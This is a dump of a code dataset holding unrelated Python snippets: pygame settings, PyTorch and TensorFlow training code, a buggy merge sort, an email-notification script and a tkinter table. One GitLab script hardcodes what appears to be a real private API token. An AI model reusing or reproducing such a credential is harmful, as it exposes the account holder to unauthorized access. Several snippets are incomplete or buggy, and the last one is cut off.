index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
5,100 | 513d7e3c34cc9da030e2e018ad2db6972cf440dc | # Main Parameters
FONTS_PATH = "media/battle_font.ttf"
LEVELS_PATH = "media/levels"
GAME_MUSIC_PATH = "media/sounds/DOOM.ogg"
MENU_MUSIC_PATH = "media/sounds/ANewMorning.ogg"
# GAME Parameters
FONT_SIZE = 30
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)
FPS = 30
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
RESPAWN_TIME = 64
|
5,101 | c7f8731fe58a0e0065827b82bb4ad4af670541db | import gitlab
from core import settings
gl = gitlab.Gitlab('https://gitlab.intecracy.com/', private_token='dxQyb5fNbLnBxvvpFjyc')
gl.auth()
project = gl.projects.get(settings.projectID)
print(project)
pipelines = project.pipelines.get(26452)
print pipelines
pipelines_jobs = pipelines.jobs.list()[2]
jobs = project.jobs.get(pipelines_jobs.id, lazy=True)
#jobs = project.jobs.get(52986)
print jobs
#print jsonString
jobs.play()
#jobs.trace()
#id_job = project.jobs.get()
#print id_job
|
5,102 | bc6c3383684cbba775d17f81ead3346fe1a01f90 | import os
import math
import time
from tqdm import tqdm
import torch
from torch import nn
import torch.optim as optim
from torch.nn import functional as F
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from nag.modules import Transformer, TransformerTorch
from nag.logger import LogManager, SummaryHelper
from nag.metric import BLEUMetric, DistinctNGram
from nag.vocab_helper import VocabBulider
from nag.utils import PadCollate, get_index, restore_best_state, init_seed
from nag.dataset import OpenSubDataset, IMSDBDataset
from nag.optimizer import RAdam
from nag.options import parse_args
from nag.criterion import similarity_regularization, LabelSmoothedCrossEntropyLoss
def train(epoch, model, dataloader, criterion, optimizer, scheduler):
global global_train_step
model.train()
total_loss = 0.
bleu_score = 0.
distinct_1_score, distinct_2_score = 0., 0.
for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='train', total=len(opensub_dataset)//opt.realbatch):
tgt_input = tgt[:, :-1]
tgt_gold = tgt[:, 1:]
tgt_lens = tgt_lens - 1
decoder_output_probs, _ = model(
src=src, tgt=tgt_input, src_lengths=src_lens, tgt_lengths=tgt_lens)
decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)
out_seqs = torch.argmax(decoder_output_probs, dim=2)
# loss
loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION
loss.backward()
total_loss += loss.item()
# calculate metrics
bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)
distinct_1_score += distinct_1(out_seqs, tgt_lens)
distinct_2_score += distinct_2(out_seqs, tgt_lens)
# summary writer
global_train_step += 1
writer.log_loss(loss.item()*ACCUMULATION, mode='train')
if (i+1) % ACCUMULATION == 0:
# clip_grad_norm_(model.parameters(), max_norm=5)
optimizer.step()
optimizer.zero_grad()
scheduler.step()
if (i+1) % opt.logstep == 0:
avg_loss = (total_loss / opt.logstep) * ACCUMULATION
avg_bleu = bleu_score / opt.logstep
avg_distinct_1 = distinct_1_score / opt.logstep
avg_distinct_2 = distinct_2_score / opt.logstep
mylogger.log(
i, epoch, model, value=avg_loss, is_train=True,
info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
total_loss = 0.
bleu_score = 0.
distinct_1_score, distinct_2_score = 0., 0.
show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2], vocab_bulider, global_train_step, mode='train')
def eval(epoch, model, dataloader, criterion, beam_size=2):
global global_valid_step
model.eval()
criterion.eval()
total_loss = 0.
bleu_score = 0.
distinct_1_score, distinct_2_score = 0., 0.
fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' + str(epoch)), 'w', encoding='utf-8')
with torch.no_grad():
for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='eval', total=len(imsdb_dataset)):
tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)
tgt_gold = tgt[:, 1:]
if beam_size > 1:
output_seqs, output_probs = model.beam_search(
src=src, tgt_begin=tgt_begin, src_length=src_lens,
eos_token_id=vocab_bulider['<eos>'], beam_size=beam_size, max_length=tgt_lens.item())
else:
output_seqs, output_probs = model.greedy(
src=src, tgt_begin=tgt_begin, src_length=src_lens,
eos_token_id=vocab_bulider['<eos>'], max_length=tgt_lens.item())
min_len = min(tgt_gold.shape[1], output_seqs.shape[1])
# loss
loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1), tgt_gold[:, :min_len])
total_loss += loss.item()
# calculate metrics
out_lens = [min_len]
bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)
distinct_1_score += distinct_1(output_seqs, out_lens)
distinct_2_score += distinct_2(output_seqs, out_lens)
# show sequence
global_valid_step += 1
fout.write(' '.join(convert_ids_to_seq(output_seqs[0], vocab_bulider)) + '\n')
if (i+1) % opt.logstep == 0:
show_gen_seq(src, output_seqs, out_lens, tgt_gold, vocab_bulider, global_valid_step, mode='valid')
# summary
avg_loss = total_loss / i
avg_bleu = bleu_score / i
avg_distinct_1 = distinct_1_score / i
avg_distinct_2 = distinct_2_score / i
writer.log_loss(avg_loss, mode='valid')
mylogger.log(
i, epoch, model, value=avg_bleu, is_train=False,
info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
fout.close()
def run_model(model, train_loader, eval_loader, niter, criterion, optimizer, scheduler):
mylogger.log_info('Running Model')
for i in range(niter):
mylogger.log_info(f'EPOCH: {i}, lr: {optimizer.state_dict()["param_groups"][0]["lr"]}')
train(i, model, train_loader, criterion, optimizer, scheduler)
eval(i, model, eval_loader, criterion, beam_size=opt.beam)
def convert_ids_to_seq(id_seq, vocab_bulider):
return [vocab_bulider.id_to_word(idx) for idx in id_seq]
def show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth, vocab_bulider, step, mode='train'):
for in_id, out_id, out_len, gold_id in zip(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth):
in_seq = convert_ids_to_seq(in_id, vocab_bulider)
out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else out_id, vocab_bulider)
gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)
writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:get_index(in_seq, '<pad>')]), global_step=step)
writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq), global_step=step)
writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:get_index(in_seq, '<pad>')]), global_step=step)
if __name__ == '__main__':
begin_time = time.strftime("%H%M%S", time.localtime())
model_name = 'transformer' + begin_time
opt = parse_args()
device = "cuda" if torch.cuda.is_available() else "cpu"
torch.cuda.set_device(opt.gpuid)
init_seed(opt.manualSeed)
ACCUMULATION = opt.batchsize // opt.realbatch
mylogger = LogManager(checkpoint_step=10,
save_dir='./save',
model_name=model_name,
log_file_name=model_name + '.log',
mode='max', device=device)
mylogger.save_args(opt)
writer = SummaryHelper(save_dir='./save', model_name=model_name)
train_data_dir = './data/opensubtitles'
# train_data_dir = './data/wmt15en-de'
vocab_file_list = ['dialogue_length3_6.post']
# vocab_file_list = ['all_de-en.bpe.post', 'all_de-en.bpe.response']
vocab_bulider = VocabBulider(
train_data_dir, src_files=vocab_file_list, ignore_unk_error=True,
vocab_file='vocab.txt', min_count=opt.mincount, update=opt.update)
print('most common 50:', vocab_bulider.most_common(50))
mylogger.log_info('vocab size: %d' % len(vocab_bulider))
# metircs
bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, ignore_smoothing_error=True)
distinct_1 = DistinctNGram(ngram=1)
distinct_2 = DistinctNGram(ngram=2)
# train dataset and dataloader
if opt.cotk: # use dataset in paper 'cotk'
# opensub_file_name_list = ['all_de-en.bpe']
opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test', 'opensub_pair_train']
unk_token = None
else: # use dataset in paper 'Non-Autoregressive Neural Dialogue Generation'
opensub_file_name_list = ['dialogue_length3_6']
unk_token = 'UNknown'
opensub_dataset = OpenSubDataset(
data_dir=train_data_dir, vocab_bulider=vocab_bulider,
file_name_list=opensub_file_name_list, unk_token='UNknown',
save_process=False, samples=opt.trainsamples, add_bos=True, add_eos=True)
print(opensub_dataset.sample())
opensub_dataloader = DataLoader(
opensub_dataset, batch_size=opt.realbatch,
collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
shuffle=True, num_workers=opt.workers, drop_last=True)
# dev set
dev_data_dir = './data/imsdb'
imsdb_file_name_list = ['imsdb_lower']
# dev_data_dir = './data/wmt15en-de'
# imsdb_file_name_list = ['newstest']
imsdb_dataset = IMSDBDataset(
data_dir=dev_data_dir, vocab_bulider=vocab_bulider,
file_name_list=imsdb_file_name_list, save_process=False,
samples=opt.validsamples, add_bos=True, add_eos=True)
print(imsdb_dataset.sample())
imsdb_dataloader = DataLoader(
imsdb_dataset, batch_size=1,
collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
shuffle=False, num_workers=opt.workers, drop_last=True)
# model definition
if opt.mine:
model = Transformer(
ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
use_src_mask=False, use_tgt_mask=True, use_memory_mask=False,
activation='relu', use_vocab_attn=False, use_pos_attn=False,
relative_clip=0, highway=False, device=device, max_sent_length=32,
share_input_output_embedding=False, share_encoder_decoder_embedding=True,
share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
else:
model = TransformerTorch(
ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
use_src_mask=False, use_tgt_mask=False, use_memory_mask=False,
activation='relu', use_vocab_attn=False, use_pos_attn=False,
relative_clip=0, highway=False, device=device, max_sent_length=32,
share_input_output_embedding=False, share_encoder_decoder_embedding=True,
share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
model.show_graph()
if opt.half:
model = model.half()
if opt.ft:
model = restore_best_state(model, opt.ckpt, save_dir='./save', device=model.device)
# optimizer and scheduler
if opt.warmup:
optimizer = RAdam(
filter(lambda p: p.requires_grad, model.parameters()),
lr=1., betas=(opt.beta1, opt.beta2), eps=opt.eps)
rate_ratio = 1. / math.sqrt(opt.embedsize)
# top_lr = 1 / sqrt(d_model * warmup_step) at step == warmup_step
scheduler = optim.lr_scheduler.LambdaLR(
optimizer,
lr_lambda=lambda step: rate_ratio * min(1. / math.sqrt(step+1), step*(opt.warmup_step**(-1.5))))
else:
optimizer = RAdam(
filter(lambda p: p.requires_grad, model.parameters()),
lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt.eps,
weight_decay=opt.weight_decay)
scheduler = optim.lr_scheduler.StepLR(
optimizer, step_size=opt.schedulerstep, gamma=opt.gamma)
# loss function
# criterion = nn.CrossEntropyLoss(ignore_index=vocab_bulider.padid) # for Transformer
criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=vocab_bulider.padid)
# run model
global_train_step, global_valid_step = 0, 0
run_model(
model, opensub_dataloader, imsdb_dataloader,
opt.niter, criterion, optimizer, scheduler)
writer.close()
|
5,103 | 07e875a24d0e63ef596db57c4ec402f768225eec | def printBoard(board,pref):
border = "+----+----+----+----+----+----+----+----+"
for row in board:
print(pref,border)
cells ="|"
for cell in row:
if cell == 0:
cell = " "
elif cell in range(1,10):
cell = "0{}".format(cell)
cells +=" {} ".format(cell)
cells +="|"
print(pref,cells )
print(pref,border)
|
5,104 | fb5508b1b5aa36c4921358d6ca7f96fc7d565241 | # https://www.acmicpc.net/problem/2751
# n 개 수가 주어짐
# 목표 오름차순정렬
# 첫 줄 n개
# 둘째줄부터 n개의 줄에 수가 주어짐 세로로
# 출력 오름차순 정렬한 결과를 한 줄에 하나씩 출력한다?
n=int(input())
n_list=[int(input()) for _ in range(n)]
# print(n_list)
nn_list = []
# 인덱스 2개 관리
mid_idx = len(n_list) //2
left_idx = 0
right_idx = mid_idx +1
while left_idx <= mid_idx and right_idx <= n-1:
# nn_list = []
if n_list[left_idx] < n_list[right_idx]:
nn_list.append(n_list[left_idx])
left_idx += 1
elif n_list[left_idx] > n_list[right_idx]:
nn_list.append(n_list[right_idx])
right_idx+=1
else:
break
print(nn_list, end='\n')
# 문제해결 정렬이 된다 = 값이 하나일때 = if start_idx == end_idx return 값이 하나짜리 리스트가 넘어간다는 것을 기억해라
# merge_sort과정에서
# combined_list=[]
# while f[fidx] <=len(f) or이냐 and냐 b[bidx]<=len(b) and or 모두 동작하지 않음
# f<b
# 작은값을 넣어지고
# 어펜드
# 작은값의 리스트 인덱스 +1
# 반대의 경우도 똑같음
# 프론트를 다 넣으면 백에서 못넣은 값들이 남아있을수도 있다
# 백이든 프론트든 하나는 끝났다 하나는 빈리스트가 나온다
# 나머지 하나의 남은 리스트를 붙여준다
# print(combined_list = combined_list +f[fidx:] +b[bidx:]) 동작을 볼 수 있음
# return combined_list = combined_list +f[fidx:] +b[bidx:]
# 탑 다운 방식 |
5,105 | 4bb006e2e457f5b11157dacb43fe94c8b400f146 | #!/usr/bin/python
import sys
class Generator:
def __init__(self, seed, factor, multiple):
self.value = seed
self.factor = factor
self.multiple = multiple
def iterate(self):
self.value = ( self.value * self.factor ) % 2147483647
# Repeat if this isn't an exact multiple
while self.value % self.multiple != 0:
self.value = ( self.value * self.factor ) % 2147483647
return self.value
# Read the input
seed_a = int(sys.argv[1])
seed_b = int(sys.argv[2])
gen_a = Generator(seed_a, 16807, 4)
gen_b = Generator(seed_b, 48271, 8)
matches = 0
for i in range(0,5000000):
val_a = gen_a.iterate()
val_b = gen_b.iterate()
# print "{0:16d}\t{1:16d}".format(val_a, val_b)
lowest16 = 2 ** 16 - 1
low_a = val_a & lowest16
low_b = val_b & lowest16
# print format(low_a, '016b')
# print format(low_b, '016b')
if ( low_a == low_b ):
matches += 1
print matches
|
5,106 | ed246f2887f19ccf922a4d386918f0f0771fb443 | # -*- coding: utf-8 -*-
"""
Created on Sat Jun 23 20:33:08 2018
@author: ashima.garg
"""
import tensorflow as tf
class Layer():
def __init__(self, shape, mean, stddev):
self.weights = tf.Variable(tf.random_normal(shape=shape, mean=mean, stddev=stddev))
self.biases = tf.Variable(tf.zeros(shape=[shape[-1]]))
def feed_forward(self, input_data, stride=None):
raise NotImplementedError
class Convolution_Layer(Layer):
def __init__(self, shape, mean, stddev):
super(Convolution_Layer, self).__init__(shape, mean, stddev)
def feed_forward(self, input_data, stride):
conv = tf.nn.conv2d(input_data, self.weights, stride, padding="VALID")
output_data = tf.nn.relu(tf.nn.bias_add(conv, self.biases))
return output_data
class Output_Layer(Layer):
def __init__(self, shape, mean, stddev):
super(Output_Layer, self).__init__(shape, mean, stddev)
def feed_forward(self, input_data, stride):
output_data = tf.nn.bias_add(tf.nn.conv2d(input_data, self.weights, stride, padding="VALID"), self.biases)
return output_data
|
5,107 | f57490c8f4a5ba76824c3b41eb18905eb2213c23 | import pandas as pd
import os
"""
This code relies heavily on the form of the data. Namely it will fail if
the authors of the same book are not comma separated. It will also be inaccurate
or even fail if the same author for different books is not spelt in exactly the
same way.
"""
loc = r'C:\Users\james\OneDrive\Documents\University\2017-18 Southampton\Data Mining\Group Coursework\Data'
#path = os.path.join(loc, r'Sample\new_books_data.csv')
path = os.path.join(loc, r'Processed_Data\new_books_data.csv')
books_data = pd.read_csv(path)
def split(string):
"""
Function takes input of a string and returns an array of strings
the original string should be comma separated with a space after
the comma in order for this function to be accurate.
"""
names = []
index = 0
last = 0
for letter in string:
if ((letter == ',') or (index == (len(string) - 1))):
if (index == (len(string) - 1)):
names.append(string[last:(index+1)])
else:
names.append(string[last:index])
last = index+2
index += 1
return names
unique_authors = []
count = 0
for name in books_data['authors']:
if (count%1000 == 0):
print(count)
split_names = split(name)
for author in split_names:
if (author in unique_authors):
pass
else:
unique_authors.append(author)
count += 1
authors_books = []
length = len(books_data.index)
count = 0
length_2 = len(unique_authors)
for author in unique_authors:
if (count%100 == 0):
print(str(count)+'/'+str(length_2))
books = []
for i in range(length):
split_names = split(books_data['authors'][i])
if (author in split_names):
books.append(books_data['goodreads_book_id'][i])
authors_books.append(books)
count += 1
d = {'author': unique_authors, 'book_id': authors_books}
books_by_author = pd.DataFrame(data=d)
#write_path = os.path.join(loc, r'Sample\books_by_author.csv')
write_path = os.path.join(loc, r'Processed_Data\books_by_author.csv')
books_by_author.to_csv(write_path, index=False)
|
5,108 | 56d90835e64bd80fd9a6bb3a9b414e154d314d4a |
def get_analyse(curse):
'''
要求curse数据中index为时间,columns为策略名称,每一列为该策略净值
'''
qf_drawdown = []
qf_yeild = []
qf_std = []
date = curse.index
y = curse.copy()
for i in curse.columns:
# 计算当前日之前的资金曲线最高点
y["max2here"] = y[i].expanding().max()
# 计算历史最高值到当日的剩余量
y["dd2here"] = y[i] / y["max2here"]
# 计算完回撤后剩余量的最小值(即最大回撤的剩余量),以及最大回撤的结束时间
remain = y.sort_values(by="dd2here").iloc[0]["dd2here"]
end_date = y.sort_values(by="dd2here").iloc[0]
drawdown = round((1 - remain) * 100, 2)
qf_drawdown.append(drawdown)
daylenth = len(date) - 1
yeild = round(((y[i][daylenth]) ** (52 / daylenth) - 1) * 100, 2)
qf_yeild.append(yeild)
y1 = y[i]
r1 = y1 / y1.shift(1) - 1
std = round(np.nanstd(r1) * 52 ** 0.5 * 100, 2)
qf_std.append(std)
drawdown = pd.DataFrame(qf_drawdown, index=curse.columns, columns=["最大回撤"])
drawdown["年化收益率"] = qf_yeild
drawdown["Calmar比率"] = drawdown["年化收益率"] / drawdown["最大回撤"]
drawdown["年波动率"] = qf_std
drawdown["夏普比率"] = drawdown["年化收益率"] / drawdown["年波动率"]
return drawdown |
5,109 | b310c35b781e3221e2dacc7717ed77e20001bafa | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 6 10:05:25 2019
@author: MCA
"""
import smtplib, ssl
from email import encoders
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
import os,sys
import time
def loadFiles(subdir, filetype):
"""
example:
dirs = ["dir1", "dir2"]
file_type = ".dat"
files, keys, data = loadFiles(dirs[0], file_type)
"""
dirname = os.path.dirname(__file__)
path = os.path.join(dirname, (subdir+"/"))
files_path = []
fileNamesFiltered = []
for root, dirs, files in os.walk(path):
for i, filename in enumerate(files):
if filename[(len(filename))-len(filetype):] == filetype:
# print(filename)
filename_path = path + filename
files_path.append(filename_path)
fileNamesFiltered.append(filename)
return fileNamesFiltered
def sendMail(filename):
smtp_server = "smtp.seznam.cz"
port = 25 # For starttls
sender_email = "xxx@email.cz"
#password = input("Type your password and press enter: ")
password = "xxxx"
# Create a secure SSL context
context = ssl.create_default_context()
receiver_email=sender_email
#compose an email
message = MIMEMultipart("alternative")
message["Subject"] = ("analysis status check: "+ str(filename))
message["From"] = sender_email
message["To"] = receiver_email
text = "analysis status check"
part1 = MIMEText(text, "plain")
message.attach(part1)
#send file
# filename = file
try:
with open(filename, "rb") as attachment:
# Add file as application/octet-stream
# Email client can usually download this automatically as attachment
file = MIMEBase("application", "octet-stream")
file.set_payload(attachment.read())
encoders.encode_base64(file)
file.add_header(
"Content-Disposition",
f"attachment; filename= {filename}",
)
message.attach(file)
except:
print("file not found")
# Try to log in to server and send email
try:
server = smtplib.SMTP(smtp_server,port)
server.ehlo() # Can be omitted
server.starttls(context=context) # Secure the connection
server.ehlo() # Can be omitted
server.login(sender_email, password)
print("logged in")
# TODO: Send email here
server.sendmail(sender_email, receiver_email, message.as_string())
print("mail sent")
except Exception as e:
# Print any error messages to stdout
print(e)
finally:
server.quit()
#--------------------------------------------------------------------------------------
if __name__ == "__main__":
run = True
directory = "/folder/folder"
fileType = ".xxx"
name = "xxxxxx_xxx__xxx.xxx"
while run == True:
names = loadFiles(directory, fileType)
print("running")
if name in names:
print("file found:", name)
f = open(name, "r")
for line in f:
if "THE ANALYSIS HAS" in line:
sendMail(name)
print("file sent")
run = False
print("done")
sys.exit()
time.sleep(300)
|
5,110 | 00dbcae2d3941c9ef4c8b6753b8f6f7a46417400 | import torch
import torch.nn as nn
import torch.optim as optim
import torchtext
import absl.flags
import absl.app
import pickle
import yaml
import numpy as np
from tqdm import tqdm
from core import model
import core.dnc.explanation
from core import functions
from core.config import ControllerConfig, MemoryConfig, TrainingConfig
# user flags
FLAGS = absl.flags.FLAGS
absl.flags.DEFINE_string("path_model", None, "Path of the trained model")
absl.flags.DEFINE_string("path_training", None, "Path where is stored the csv dataset")
absl.flags.DEFINE_string("path_val", None, "Path where is stored the csv dataset")
absl.flags.DEFINE_integer("top_k", 25, "Number of read cells considered for each step")
absl.flags.DEFINE_boolean("use_surrogate", False, " Whether to extract surrogate ground truth for explanation")
absl.flags.mark_flag_as_required("path_model")
absl.flags.mark_flag_as_required("path_training")
absl.flags.mark_flag_as_required("path_val")
def run_explanations(network, explanation_module, data_iterator):
network.eval()
best_accuracy = 0
worst_accuracy = 0
best_correct = 0
worst_correct = 0
covered = 0
total = 0
#print stuff
pbar = tqdm()
pbar.reset(total=len(data_iterator))
for _, data in enumerate(data_iterator):
(_, p1, p2, p3, p4, a1, a2), y = data
y = y - 1 # gold index
story = torch.cat((p1,p2,p3,p4),1)
background = [p1,p2,p3,p4]
answers = [a1,a2]
total += y.size(0)
#get output
with torch.no_grad():
outcome, rh, wh = network(story,[a1,a2])
predicted = torch.argmax(outcome, 1)
for index_elem in range(p1.shape[0]):
elem_background = [p1[index_elem:index_elem+1,:], p2[index_elem:index_elem+1,:],p3[index_elem:index_elem+1,:],p4[index_elem:index_elem+1,:]]
elem_answers = [a1[index_elem:index_elem+1,:], a2[index_elem:index_elem+1,:]]
elem_predicted = predicted[index_elem]
sgt = explanation_module.get_sgt(network, elem_background,elem_answers )
# case where there are contraddictory surrogate ground truth
if len(set(sgt)) > 1:
covered += 1
rank, _ = explanation_module.get_rank(elem_background,wh[0][0],rh[elem_predicted.item()+1][0] )
best_prediction = sgt[rank[0]-1]
best_correct += (elem_predicted == best_prediction).sum().item()
worst_prediction = sgt[rank[-1]-1]
worst_correct += (elem_predicted == worst_prediction).sum().item()
best_accuracy = float(best_correct / covered) if best_correct > 0 else 0
worst_accuracy = float(worst_correct / covered) if worst_correct > 0 else 0
#print
pbar.set_postfix({'Best':best_accuracy,'Worst':worst_accuracy,
'cov':covered/total})
pbar.update()
pbar.close()
return best_accuracy, worst_accuracy
def run_training_epoch(network, data_iterator, loss_function, optimizer, max_grad_norm):
network.train()
# init cumulative variables
accuracy = 0
correct = 0
total = 0
losses = []
# print utility
pbar = tqdm()
pbar.reset(total=len(data_iterator))
#data_iterator.init_epoch()
for _, data in enumerate(data_iterator):
optimizer.zero_grad()
(_, p1, p2, p3, p4, a1, a2), y = data
y = y - 1 # gold index
story = torch.cat((p1,p2,p3,p4),1)
# get output
outcome, _, _ = network(story,[a1,a2])
predicted = torch.argmax(outcome, 1)
# get loss
loss = loss_function(outcome,y)
loss.backward()
losses.append(loss.item())
# update metrics
correct += (predicted == y).sum().item()
total += y.size(0)
accuracy = float(correct / total) if correct > 0 else 0
# update weights
nn.utils.clip_grad_norm_(network.parameters(), max_norm=max_grad_norm)
optimizer.step()
pbar.set_postfix({'Acc':accuracy})
#print
pbar.update()
pbar.close()
return accuracy, np.mean(losses)
def run_val_epoch(network, data_iterator):
network.eval()
accuracy = 0
correct = 0
total = 0
pbar = tqdm()
pbar.reset(total=len(data_iterator))
with torch.no_grad():
for _, data in enumerate(data_iterator):
(_,p1, p2, p3, p4, a1, a2), y = data
y = y - 1 # gold index
story = torch.cat((p1,p2,p3,p4),1)
outcome, _, _ = network(story,[a1,a2])
# update metrics
predicted = torch.argmax(outcome, 1)
correct += (predicted == y).sum().item()
total += y.size(0)
accuracy = float(correct / total) if correct > 0 else 0
#print
pbar.set_postfix({'Acc':accuracy})
pbar.update()
pbar.close()
return accuracy
def run_training(path_training, path_val, path_model, top_k, required_explanation):
#get configuration from dict and user
config_dict = yaml.safe_load(open("config.yaml", 'r'))
controller_config = ControllerConfig(**config_dict['controller'])
memory_config = MemoryConfig(**config_dict['memory'])
training_parameters = TrainingConfig(**config_dict['training'])
# get available device
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train_dataset = functions.get_cloze_dataset(path_training)
val_dataset = functions.get_cloze_dataset(path_val)
train_iterator = torchtext.data.Iterator(train_dataset,batch_size=training_parameters.batch_size, train=True, shuffle=True, device=DEVICE)
val_iterator = torchtext.data.Iterator(val_dataset,batch_size=training_parameters.batch_size, train=False, sort=False,device=DEVICE)
# Get Embedding
vocab = torch.load("dataset/vocab")['vocab']
embedding_pretrained_weights = vocab.vectors
pre_trained_embeddings = torch.as_tensor(embedding_pretrained_weights).to(DEVICE)
padding_index=1
embedding_dim = len(embedding_pretrained_weights[0])
#init model
network = model.ClozeModel(controller_config, memory_config, embedding_dim,len(pre_trained_embeddings),dropout=training_parameters.dropout).to(DEVICE)
network.embeddings.weight.data.copy_(pre_trained_embeddings)
network.embeddings.weight.requires_grad = True
explanation_mod = core.dnc.explanation.ExplanationModule(padding_value=padding_index,top_k=top_k)
loss_function = nn.CrossEntropyLoss()
optimizer = optim.Adam(network.parameters(), lr=training_parameters.learning_rate, eps=1e-7)
# initialize variables
top1_acc = 0.0
for epoch in range(1,11):
print("Running epoch {}".format(epoch))
_,_ = run_training_epoch(network,train_iterator,loss_function,optimizer,training_parameters.max_grad_norm)
print("Validation epoch {}".format(epoch))
accuracy = run_val_epoch(network,val_iterator)
if required_explanation:
print("Explaining training dataset")
run_explanations(network,explanation_mod,train_iterator)
print("Explain validation dataset")
run_explanations(network,explanation_mod,val_iterator)
if accuracy > top1_acc:
top1_acc = accuracy
print("saving model...")
checkpoint = {'controller_config':config_dict['controller'], 'memory_config':config_dict['memory'],
'state_dict':network.state_dict(), 'len_embeddings':len(pre_trained_embeddings)}
torch.save(checkpoint, path_model)
def main(argv):
path_model = FLAGS.path_model
path_training = FLAGS.path_training
path_val = FLAGS.path_val
top_k = FLAGS.top_k
use_surr = FLAGS.use_surrogate
run_training(path_training,path_val, path_model, top_k, use_surr)
print("Training process ended! The new model is stored on {}.".format(path_model))
if __name__ == '__main__':
absl.app.run(main) |
5,111 | a4d47b9a28ec66f6a0473498674ebc538d909519 | import tkinter.ttk
import tkinter as tk
def update_info(info_t, data):
# temp = info_t.selection_set("x")
# print(temp)
# info_t.delete(temp)
# temp = info_t.selection_set("y")
# info_t.delete(temp)
pass
def path_to_string(s):
res = ""
for i in range(len(s)-1):
res += str(s[i][0])
res += ", "
res += str(s[i][1])
res += " > "
res += str(s[i][0])
res += ", "
res += str(s[i][1])
return res
def read_file_formatting(self, patrol, target):
data = []
for i in range(len(patrol)):
data.append([])
for j in range(len(target)+7):
data[i].append(0)
for i in range(len(patrol)):
data[i][0] = patrol[i].get_x()
data[i][1] = patrol[i].get_y()
# 현 탐지
data[i][2] = 0
# 총 탐지
data[i][3] = 0
# 경로
data[i][-1] = self.path_to_string(patrol[i].get_path())
# 탐지 범위
data[i][-2] = patrol[i].get_detection_dist()
# Knot
data[i][-3] = patrol[i].get_knot()
# target detection time
for j in range(len(target)):
data[i][4+j] = 0
return data
def init_info(frame_i, init_data):
## setting info
info_lbl = tk.Label(frame_i, text="Ship Info")
info_lbl.pack()
# setting treeView
info_tree = tk.ttk.Treeview(frame_i, columns=["함정 1", "함정 2", "함정 3"], displaycolumns=["함정 1", "함정 2", "함정 3"])
info_tree.pack()
# 0행
info_tree.column("#0", width=30, anchor="center")
info_tree.heading("#0", text="속성")
# 1행
info_tree.column("#1", width=70, anchor="w")
info_tree.heading("#1", text="함정 1", anchor="center")
# 2행
info_tree.column("#2", width=70, anchor="w")
info_tree.heading("#2", text="함정 2", anchor="center")
# 3행
info_tree.column("#3", width=70, anchor="w")
info_tree.heading("#3", text="함정 3", anchor="center")
## insert table
data = []
for i in range(len(init_data)):
data.append(init_data[i][0])
info_tree.insert('', "end", text="X", values=data, iid="x")
data = []
for i in range(len(init_data)):
data.append(init_data[i][1])
info_tree.insert('', "end", text="Y", values=data, iid="y")
data = []
for i in range(len(init_data)):
data.append(init_data[i][2])
info_tree.insert('', "end", text="Now_d", values=data, iid="nd" + str(i))
data = []
for i in range(len(init_data)):
data.append(init_data[i][3])
info_tree.insert('', "end", text="Total_d", values=data, iid="td" + str(i))
data = []
for i in range(len(init_data)):
data.append(init_data[i][4])
info_tree.insert('', "end", text="T1", values=data, iid="t1" + str(i))
data = []
for i in range(len(init_data)):
data.append(init_data[i][5])
info_tree.insert('', "end", text="T2", values=data, iid="t2" + str(i))
data = []
for i in range(len(init_data)):
data.append(init_data[i][6])
info_tree.insert('', "end", text="T3", values=data, iid="t3" + str(i))
data = []
for i in range(len(init_data)):
data.append(init_data[i][7])
info_tree.insert('', "end", text="Knot", values=data, iid="knot" + str(i))
data = []
for i in range(len(init_data)):
data.append(init_data[i][8])
